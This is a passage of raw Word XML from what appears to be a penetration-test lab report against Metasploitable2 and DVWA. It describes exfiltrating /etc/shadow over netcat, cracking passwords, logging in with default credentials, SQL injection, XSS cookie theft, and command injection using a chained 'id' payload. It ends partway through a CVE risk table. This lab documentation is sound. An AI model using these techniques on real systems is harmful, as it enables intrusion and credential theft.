      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Following root shell access, /etc/shadow was read and transferred to Kali via netcat for offline password cracking.</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048250" cy="4381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5048250" cy="4381500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 5.1 — /etc/shadow file contents; MD5 password hashes extracted directly from the root shell.</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4133850" cy="4381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4133850" cy="4381500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 5.2 — Hashes transferred via netcat and saved to /root/hashes.txt on the attacking machine.</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24193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5334000" cy="2419350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 5.3 — John the Ripper results: 6 of 7 passwords cracked (sys:batman, klog:123456789, msfadmin:msfadmin, and others).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">5.2 VNC Desktop Access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The VNC service on port 5900 was accessed using the default password 'password', providing full graphical desktop control of the target.</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2952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5334000" cy="2952750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 5.4 — TightVNC session showing full root GUI desktop access on Metasploitable2.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E74B5" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Database Attacks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">6.1 MySQL — No Password Authentication</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">MySQL 5.0.51a was accessible with no password whatsoever. Seven databases were exposed, including the dvwa and metasploit application databases.</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40576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7" cstate="none"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="4057650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 6.1 — MySQL root login with no password required; all 7 databases listed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">6.2 DVWA Users Table Dump</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The DVWA database contained 5 user accounts with MD5 password hashes. All 4 unique hashes were successfully cracked offline.</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15621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8" cstate="none"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="1562100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 6.2 — DVWA users table: 5 accounts with MD5 hashes (password, abc123, charley, letmein).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">6.3 Tomcat Manager — Default Credentials</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Apache Tomcat 5.5's manager panel was accessed using default credentials (tomcat:tomcat), allowing full WAR file deployment — a direct path to remote code execution.</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2828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9" cstate="none"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="2828925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 6.3 — Tomcat Web Application Manager: full administrative access using default credentials.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E74B5" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">7. Web Application Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">7.1 SQL Injection — User Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The DVWA SQL Injection page is vulnerable to OR-based injection, dumping all 5 user accounts from the database with a single crafted request.</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36861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0" cstate="none"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="3686175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 7.1 — SQL Injection using an OR 1=1 payload, dumping all DVWA user accounts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">7.2 SQL Injection — UNION SELECT Password Hash Dump</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION-based injection was used to extract password hashes directly from the users table.</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35909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1" cstate="none"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="3590925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 7.2 — UNION SELECT injection: all password hashes extracted directly from the DVWA database.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">7.3 Reflected XSS — Script Execution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Reflected XSS was confirmed on the name input field. JavaScript executed directly in the browser context, confirming the field is unsanitized.</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22574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2" cstate="none"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="2257425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 7.3 — XSS alert popup confirming JavaScript execution in the browser.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">7.4 XSS — Session Cookie Theft</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Using a document.cookie payload, session hijacking was demonstrated — the full PHPSESSID session token was exposed and captured.</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18288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3" cstate="none"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="1828800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 7.4 — XSS cookie theft: PHPSESSID=7c321f668c948dcffbb8ca1b32e832e7 captured via injected script.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">7.5 Command Injection — OS Command Execution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Command injection on the ping function allowed arbitrary OS command execution via semicolon chaining.</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5334000" cy="25336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4" cstate="none"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="2533650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 7.5 — Command injection via 127.0.0.1; id, confirming execution in the www-data context.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">7.6 Command Injection — /etc/passwd via Web</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The full contents of /etc/passwd were extracted through the same web application command injection vulnerability, demonstrating direct file-system read access from a web-facing form.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="D0D7E2" w:sz="4" w:space="6"/>
          <w:left w:val="single" w:color="D0D7E2" w:sz="4" w:space="6"/>
          <w:bottom w:val="single" w:color="D0D7E2" w:sz="4" w:space="6"/>
          <w:right w:val="single" w:color="D0D7E2" w:sz="4" w:space="6"/>
        </w:pBdr>
        <w:spacing w:after="100" w:before="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4876800" cy="43815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5" cstate="none"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4876800" cy="4381500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 7.6 — Command injection used to dump /etc/passwd via the DVWA web interface.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E74B5" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">8. Risk Summary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000"/>
        <w:gridCol w:w="1350"/>
        <w:gridCol w:w="3000"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="1F3864" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1600"/>
            <w:shd w:fill="1F3864" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
            <w:shd w:fill="1F3864" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1350"/>
            <w:shd w:fill="1F3864" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="1F3864" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">vsftpd 2.3.4 Backdoor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1600"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE-2011-2523</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">10.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1350"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Root confirmed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Samba usermap_script</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1600"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE-2007-2447</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">10.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1350"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Root shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">UnrealIRCd Backdoor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1600"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE-2010-2075</w:t>
            </w:r>
          </w:p>
